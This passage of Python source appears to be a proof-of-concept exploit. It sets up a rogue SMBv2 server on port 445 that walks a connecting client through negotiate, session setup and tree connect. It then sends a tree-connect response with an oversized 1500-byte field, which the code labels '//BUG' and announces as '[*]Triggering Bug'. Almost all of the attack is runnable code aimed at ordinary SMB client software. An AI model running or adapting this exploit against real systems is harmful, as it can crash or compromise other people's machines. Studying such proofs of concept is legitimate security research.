| CalculateASN = str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"]) | |
| MechLen = str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"]) | |
| #Packet Struct len | |
| self.fields["SecBlobLen"] = struct.pack("<h",len(CalculateSecBlob)) | |
| self.fields["SecBlobTag0Len"] = struct.pack("<B",len(CalculateASN)) | |
| self.fields["NegTokenRespLen"] = struct.pack("<B", len(CalculateASN)-2) | |
| self.fields["SecBlobTag3Len"] = struct.pack("<B",len(MechLen)) | |
| self.fields["SecBlobOctetLen"] = struct.pack("<B",len(MechLen)-2) | |
| class SMB2TreeData(Packet): | |
| fields = OrderedDict([ | |
| ("Len", "\x10\x00"), | |
| ("ShareType", "\x02\x00"), | |
| ("ShareFlags", "\x30\x00\x00\x00"), | |
| ("ShareCapabilities", "\x00\x00\x00\x00"), | |
| ("AccessMask", "\xff\x01\x1f\x01"), | |
| ("Data", ""), | |
| ]) | |
| ########################################################################## | |
| class SMB2(socketserver.BaseRequestHandler): | |
| def handle(self): | |
| try: | |
| self.request.settimeout(1) | |
| print ("From:", self.client_address) | |
| data = self.request.recv(1024) | |
| ##Negotiate proto answer. | |
| if data[8:10] == "\x72\x00" and data[4:5] == "\xff": | |
| head = SMBv2Header(CreditCharge="\x00\x00",Credits="\x01\x00",PID="\x00\x00\x00\x00") | |
| t = SMB2NegoAns() | |
| t.calculate() | |
| packet1 = str(head)+str(t) | |
| buffer1 = longueur(packet1)+packet1 | |
| print ("[*]Negotiating SMBv2.") | |
| self.request.send(buffer1) | |
| data = self.request.recv(1024) | |
| if data[16:18] == "\x00\x00": | |
| CreditsRequested = data[18:20] | |
| if CreditsRequested == "\x00\x00": | |
| CreditsRequested = "\x01\x00" | |
| CreditCharged = data[10:12] | |
| head = SMBv2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data)) | |
| t = SMB2NegoAns(Dialect="\x02\x02") | |
| t.calculate() | |
| packet1 = str(head)+str(t) | |
| buffer1 = longueur(packet1)+packet1 | |
| print ("[*]Negotiate Protocol SMBv2 packet sent.") | |
| self.request.send(buffer1) | |
| data = self.request.recv(1024) | |
| #Session More Work to Do | |
| if data[16:18] == "\x01\x00": | |
| head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID="\x4d\x00\x00\x00\x00\x04\x00\x00",NTStatus="\x16\x00\x00\xc0") | |
| t = SMB2Session1Data() | |
| t.calculate() | |
| packet1 = str(head)+str(t) | |
| buffer1 = longueur(packet1)+packet1 | |
| print ("[*]Session challenge SMBv2 packet sent.") | |
| self.request.send(buffer1) | |
| data = self.request.recv(1024) | |
| #Session Positive | |
| if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02": | |
| head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x00\x00\x00\x00", SessionID=GrabSessionID(data)) | |
| t = SMB2SessionAcceptData() | |
| t.calculate() | |
| packet1 = str(head)+str(t) | |
| buffer1 = longueur(packet1)+packet1 | |
| self.request.send(buffer1) | |
| data = self.request.recv(1024) | |
| ## Tree Connect | |
| if data[16:18] == "\x03\x00": | |
| head = SMBv2Header(Cmd="\x03\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", TID="\x01\x00\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x00\x00\x00\x00", SessionID=GrabSessionID(data)) | |
| t = SMB2TreeData(Data="C"*1500)#//BUG | |
| packet1 = str(head)+str(t) | |
| buffer1 = longueur(packet1)+packet1 | |
| print ("[*]Triggering Bug; Tree Connect SMBv2 packet sent.") | |
| self.request.send(buffer1) | |
| data = self.request.recv(1024) | |
| except Exception: | |
| print ("Disconnected from", self.client_address) | |
| pass | |
| socketserver.TCPServer.allow_reuse_address = 1 | |
| launch = socketserver.TCPServer(('', 445),SMB2) | |
| launch.serve_forever() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment